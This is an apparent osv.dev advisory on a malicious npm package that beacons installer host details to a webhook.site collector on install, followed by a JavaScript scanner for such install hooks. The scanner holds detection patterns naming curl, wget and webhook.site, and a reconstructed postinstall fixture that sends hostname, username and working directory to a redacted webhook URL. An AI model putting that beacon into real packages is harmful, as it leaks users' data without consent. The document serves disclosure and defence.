npm

getd-web-corporativa @0.0.1

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5472

Ecosystem

npm

Summary

On npm install, postinstall.js performs an HTTPS GET to a hardcoded webhook.site receiver, leaking the installer's hostname, OS username, platform, current working directory, package name/version, CI/build indicators, and a timestamp via URL query parameters. Errors are swallowed, so the install appears to succeed even when the beacon fails. The destination is a public request collector: any party holding the UUID path can read every submission, so this amounts to unauthenticated host reconnaissance suitable for follow-on targeting. The package name resembles the @getd/* scope but is published unscoped by jplopezy ("defensive-squat") with no repository and a placeholder homepage; the README's "defensive squat telemetry" framing does not change the fact that installer identity data is shipped off-host without consent on every install. The package has no other functionality.

Source: amazon-inspector (6751d3ca04c2ae596f7e809e339770edaed576060d361c061311960b0a3a7033)
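The behaviour above (an install-time lifecycle hook that reads host identity and sends it to an outbound URL) is easy to check for before a package reaches a build. The following is an added example written for this page, not code from the advisory, from osv.dev, or from the package itself: a small scanner over a parsed package.json and the tarball's files that flags install hooks combining outbound network calls with host-identity reads. The sample inputs are constructed to match the advisory's description; the real postinstall.js and its webhook.site UUID are not reproduced, and the placeholder path is marked as such.

```javascript
// Added example, not code from the advisory or from the package it describes.
// Scans an npm package for the MAL-2026-5472 shape: a lifecycle script that runs
// during `npm install` and ships host identity data to an outbound URL.

// Lifecycle hooks npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Outbound-network indicators, checked in both the script command and any
// JavaScript file it invokes.
const NETWORK_PATTERNS = [
  /\bhttps?\.(?:get|request)\s*\(/,   // Node http/https client
  /\bfetch\s*\(/,                     // global fetch (Node 18+)
  /\b(?:curl|wget)\b/,                // shell download in the script command itself
  /\bwebhook\.site\b/,                // public request collector named in the advisory
];

// Host-identity reads matching the fields the advisory says were exfiltrated.
const HOST_INFO_PATTERNS = [
  /\bos\.hostname\s*\(/,
  /\bos\.userInfo\s*\(/,
  /\bprocess\.platform\b/,
  /\bprocess\.cwd\s*\(/,
  /\bprocess\.env\.(?:CI|GITHUB_ACTIONS|BUILD_NUMBER|JENKINS_URL)\b/,
];

// Returns the .js file a `node something.js` command invokes, or null.
function referencedFile(command) {
  const m = command.match(/\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/);
  return m ? m[1] : null;
}

// pkgJson: parsed package.json; files: { relativePath: sourceText } from the tarball.
// One finding per install hook; a hook is `suspicious` when it both reaches the
// network and reads host identity.
function scanPackage(pkgJson, files) {
  const findings = [];
  const scripts = (pkgJson && pkgJson.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const file = referencedFile(command);
    const source = file && files[file] ? files[file] : "";
    const text = `${command}\n${source}`;
    const network = NETWORK_PATTERNS.filter((re) => re.test(text)).map(String);
    const hostInfo = HOST_INFO_PATTERNS.filter((re) => re.test(text)).map(String);
    findings.push({ hook, command, file, network, hostInfo,
      suspicious: network.length > 0 && hostInfo.length > 0 });
  }
  return {
    hasInstallHooks: findings.length > 0,
    suspicious: findings.some((f) => f.suspicious),
    findings,
  };
}

// Constructed sample modelled on the advisory text; NOT the real package contents.
const SAMPLE_MALICIOUS = {
  pkg: { name: "getd-web-corporativa", version: "0.0.1",
         scripts: { postinstall: "node postinstall.js" } },
  files: {
    "postinstall.js": [
      'const https = require("https");',
      'const os = require("os");',
      "const q = new URLSearchParams({",
      "  host: os.hostname(), user: os.userInfo().username, platform: process.platform,",
      "  cwd: process.cwd(), ci: String(!!process.env.CI), ts: Date.now(),",
      "}).toString();",
      "// placeholder path: the real UUID is not reproduced in this example",
      'https.get("https://webhook.site/REDACTED-UUID?" + q, () => {}).on("error", () => {});',
    ].join("\n"),
  },
};

// Constructed benign package: a postinstall hook that only writes a build artifact.
const SAMPLE_BENIGN = {
  pkg: { name: "example-lib", version: "1.0.0",
         scripts: { postinstall: "node build.js", test: "node test.js" } },
  files: { "build.js": 'require("fs").writeFileSync("dist/out.js", "// built");' },
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanPackage(SAMPLE_MALICIOUS.pkg, SAMPLE_MALICIOUS.files), null, 2));
  console.log(JSON.stringify(scanPackage(SAMPLE_BENIGN.pkg, SAMPLE_BENIGN.files), null, 2));
}
```

A scanner like this is a triage aid, not a verdict: obfuscated or dynamically built code defeats the regexes, and many legitimate packages use postinstall for native builds. The blanket mitigation for this class is to stop running install scripts from dependencies at all, with `npm install --ignore-scripts` or `ignore-scripts=true` in .npmrc, and to re-enable scripts only for the packages that are known to need them.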
